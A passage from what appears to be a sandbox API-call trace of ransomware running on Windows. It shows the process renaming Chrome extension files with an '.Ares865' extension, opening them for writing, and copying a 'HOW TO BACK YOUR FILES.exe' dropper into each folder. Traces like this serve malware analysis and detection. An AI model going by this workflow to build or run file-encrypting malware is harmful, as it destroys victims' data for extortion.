ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3f6d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.100] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.100] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.100] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.100] lstrlenW (lpString="messages.json") returned 13 [0101.100] lstrlenW (lpString="Ares865") returned 7 [0101.100] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.100] lstrlenW (lpString=".dll") returned 4 [0101.100] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.100] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.Ares865") returned 160 [0101.100] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.102] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312) returned 1 [0101.105] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda" [0101.105] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda" [0101.105] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.105] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.105] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.106] GetLastError () returned 0x0 [0101.106] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ab7660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e41cec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.106] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.106] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.106] lstrcpyW (in: lpString1=0x2cce4f2, lpString2="1.0.0.2_0" | out: lpString1="1.0.0.2_0") returned="1.0.0.2_0" [0101.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0101.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x106) returned 0x32afc8 [0101.106] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0101.106] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e41cec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0101.107] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0101.107] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e41cec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0101.107] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0101.107] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c90 [0101.107] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0" [0101.107] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0" [0101.107] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.107] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.107] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.108] GetLastError () returned 0x0 [0101.108] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82651e90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e41cec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.108] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.108] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.108] lstrcpyW (in: lpString1=0x2cce506, lpString2="craw_background.js" | out: lpString1="craw_background.js") returned="craw_background.js" [0101.108] lstrlenW (lpString="craw_background.js") returned 18 [0101.108] lstrlenW (lpString="Ares865") returned 7 [0101.108] lstrcmpiW (lpString1="ound.js", lpString2="Ares865") returned 1 [0101.109] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.Ares865") returned 157 [0101.109] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.ares865"), dwFlags=0x1) returned 1 [0101.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.110] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=207406) returned 1 [0101.128] lstrcpyW (in: lpString1=0x2cce506, lpString2="craw_window.js" | out: lpString1="craw_window.js") returned="craw_window.js" [0101.128] lstrlenW (lpString="craw_window.js") returned 14 [0101.128] lstrlenW (lpString="Ares865") returned 7 [0101.128] lstrcmpiW (lpString1="ndow.js", lpString2="Ares865") returned 1 [0101.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.Ares865") returned 153 [0101.128] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.ares865"), dwFlags=0x1) returned 1 [0101.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.130] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=241753) returned 1 [0101.145] lstrcpyW (in: lpString1=0x2cce506, lpString2="css" | out: lpString1="css") returned="css" [0101.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0101.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10e) returned 0x2cb310 [0101.145] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0101.145] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e41cec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0101.145] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0101.145] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8289e4a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5e5f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5e5f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="html", cAlternateFileName="")) returned 1 [0101.145] lstrcmpiW (lpString1="html", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.145] lstrcmpiW (lpString1="html", lpString2="aoldtz.exe") returned 1 [0101.146] lstrcpyW (in: lpString1=0x2cce506, lpString2="html" | out: lpString1="html") returned="html" [0101.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0101.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x110) returned 0x2ca4e8 [0101.146] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0101.146] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828a32c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5e5f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5e5f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0101.146] lstrcmpiW (lpString1="images", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.146] lstrcmpiW (lpString1="images", lpString2="aoldtz.exe") returned 1 [0101.146] lstrcpyW (in: lpString1=0x2cce506, lpString2="images" | out: lpString1="images") returned="images" [0101.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0101.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x114) returned 0x2e0710 [0101.146] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0101.146] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x826545a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x828e2a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82aa3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x52a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0101.146] lstrcmpiW (lpString1="manifest.json", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.146] lstrcmpiW (lpString1="manifest.json", lpString2="aoldtz.exe") returned 1 [0101.146] lstrcpyW (in: lpString1=0x2cce506, lpString2="manifest.json" | out: lpString1="manifest.json") returned="manifest.json" [0101.146] lstrlenW (lpString="manifest.json") returned 13 [0101.146] lstrlenW (lpString="Ares865") returned 7 [0101.146] lstrcmpiW (lpString1="st.json", lpString2="Ares865") returned 1 [0101.146] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.Ares865") returned 152 [0101.146] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0101.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.148] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1322) returned 1 [0101.151] lstrcpyW (in: lpString1=0x2cce506, lpString2="_locales" | out: lpString1="_locales") returned="_locales" [0101.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0101.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x118) returned 0x2e0838 [0101.152] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0101.152] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828e7880, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e41cec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0101.152] lstrcmpiW (lpString1="_metadata", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.152] lstrcmpiW (lpString1="_metadata", lpString2="aoldtz.exe") returned -1 [0101.152] lstrcpyW (in: lpString1=0x2cce506, lpString2="_metadata" | out: lpString1="_metadata") returned="_metadata" [0101.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0101.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11a) returned 0x2e0960 [0101.152] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0101.152] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828e7880, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e41cec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0101.152] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0101.152] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0101.152] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata" [0101.152] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata" [0101.152] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.152] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.153] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.153] GetLastError () returned 0x0 [0101.153] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.153] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 